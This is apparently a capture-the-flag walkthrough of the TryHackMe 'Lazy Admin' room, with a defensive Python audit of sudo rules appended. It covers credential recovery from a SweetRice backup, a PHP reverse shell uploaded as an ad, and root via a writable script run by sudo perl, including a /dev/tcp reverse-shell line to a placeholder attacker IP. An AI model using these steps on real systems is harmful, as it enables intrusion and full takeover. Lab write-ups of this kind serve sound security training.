dmdhrumilmistry's gitbook
Lazy Admin


Last updated 2 years ago


Covers:

  • Service Discovery

  • Finding Vulnerabilities

  • Exploitation

  • Privilege Escalation

Target Details

  • IP: 10.10.209.190

Service Discovery

  • Using nmap

    nmap -sV -sC -Pn -oN nmap.txt 10.10.209.190
  • Services Discovered

    | Service | Port | Version             |
    |---------|------|---------------------|
    | SSH     | 22   | OpenSSH 7.2p2       |
    | HTTP    | 80   | Apache httpd 2.4.18 |

  • Finding Directories on HTTP server using GoBuster

    gobuster dir -u http://10.10.209.190/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt

    Directories Discovered: /content

  • On visiting the /content page, we find that the server is running a basic CMS with Sweet Rice installed

Finding Vulnerabilities

  • Credentials recovered from the SQL backup (see the mysql_backup note at the end of this page)

    | username | password hash                    | password    |
    |----------|----------------------------------|-------------|
    | manager  | 42f749ade7f9e195bf475f37a44cafcb | Passwordxxx |

    We don't know the login page yet!

  • Moving up to the parent directory /content/inc/, we get access to all the files, including /content/inc/lastest.txt, which reveals the Sweet Rice version: 1.5.1

  • On reading the exploit, the admin page is listed as /as, but on this target the admin page is at /content/as

  • Visit /content/as with the admin credentials above

  • We can add custom php code from ADS tab

  • TL;DR

    | Service          | Vulnerability     |
    |------------------|-------------------|
    | Sweet Rice       | Backup Disclosure |
    | Sweet Rice 1.5.1 | File Upload       |

Exploitation

  • Create an evil reverse shell advertisement

  • Start listener using netcat

    nc -nlvp 1234
  • From /content/inc/ads/ we can execute the uploaded reverse shell

  • We have access to the shell

    listening on [any] 1234 ...
    connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312
    Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
     11:43:09 up  1:26,  0 users,  load average: 0.83, 0.30, 0.10
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off

Privilege Escalation

  • Finding Escalation Vectors

    $ sudo -l
    Matching Defaults entries for www-data on THM-Chal:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    
    User www-data may run the following commands on THM-Chal:
        (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

    We can run perl and /home/itguy/backup.pl as root

  • Victim's shell

    # overwrite contents of copy.sh with reverse shell on port
    echo "/bin/bash -c 'exec bash -i &>/dev/tcp/[ATTACKER_VPN_IP]/4444 <&1'" > /etc/copy.sh
    
    # on attacker's machine start netcat listener session on port 4444
    # nc -nlvp 4444
    
    # execute reverse shell with sudo rights
    sudo /usr/bin/perl /home/itguy/backup.pl
  • Root Shell on Attacker's machine

    nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 52812
    bash: cannot set terminal process group (1058): Inappropriate ioctl for device
    bash: no job control in this shell
    root@THM-Chal:/#
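As an added, defender-side illustration of the misconfiguration above (example code, not part of the write-up), the Python below parses the `sudo -l` output shown on this page and flags NOPASSWD rules whose script argument, or a file that script runs, can be modified by non-root users. The file owners/modes and the assumption that backup.pl invokes /etc/copy.sh are constructed to mirror the write-up; backup.pl's contents are not on the page.

```python
import re
import stat

# Constructed sample: the `sudo -l` output shown in this write-up.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
"""

# Assumed (owner uid, mode) for each file, constructed to mirror the
# write-up: backup.pl is root-owned, but /etc/copy.sh is world-writable.
FAKE_STAT = {
    "/usr/bin/perl": (0, 0o755),
    "/home/itguy/backup.pl": (0, 0o644),
    "/etc/copy.sh": (0, 0o777),
}
# Assumption: backup.pl executes /etc/copy.sh. The write-up only shows the
# attacker overwriting copy.sh; backup.pl's contents are not on the page.
SCRIPT_DEPENDENCIES = {"/home/itguy/backup.pl": ["/etc/copy.sh"]}

# Matches a sudoers command line such as "(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>/\S+)(?P<args>.*)$")


def parse_sudo_l(text):
    """Return (runas, nopasswd, command, args) for every command line in sudo -l output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            nopasswd = "NOPASSWD:" in m.group("tags")
            rules.append((m.group("runas"), nopasswd, m.group("cmd"), m.group("args").split()))
    return rules


def writable_by_non_root(path, stat_table=FAKE_STAT):
    """True if the file is group/world-writable or not owned by root (uid 0)."""
    uid, mode = stat_table[path]
    return uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(text, stat_table=FAKE_STAT, deps=SCRIPT_DEPENDENCIES):
    """Flag NOPASSWD rules where the script argument, or a file it runs, can be modified by non-root."""
    findings = []
    for _runas, nopasswd, cmd, args in parse_sudo_l(text):
        for path in (args if nopasswd else []):
            for dep in [path] + deps.get(path, []):
                if dep in stat_table and writable_by_non_root(dep, stat_table):
                    findings.append((cmd, path, dep))  # (interpreter, script, writable file)
    return findings
```

On a real host, replace FAKE_STAT with os.stat() lookups so the chain of files is checked against actual ownership and modes.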

Get Flags

  • User Flag

    cat /home/itguy/user.txt
    # THM{63e5bce9271952xxxxxxxxxxxxxxxxxx}
  • Root Flag

    cat /root/root.txt
    # THM{6637f41d0177bxxxxxxxxxxxxxxxxxxx}

From the 1st vulnerability: after visiting the /content/inc/mysql_backup/ link we get the SQL database file, from which we get the username and password hash, which can be easily cracked online using various tools such as crackstation.

On searching for Sweet Rice 1.5.1 vulnerabilities on a search engine, it leads to the File Upload exploit for that version.

Using the PentestMonkey php reverse shell template, we can get access to a shell by changing the ip variable to our attacker's VPN IP and then uploading it through the Ads tab.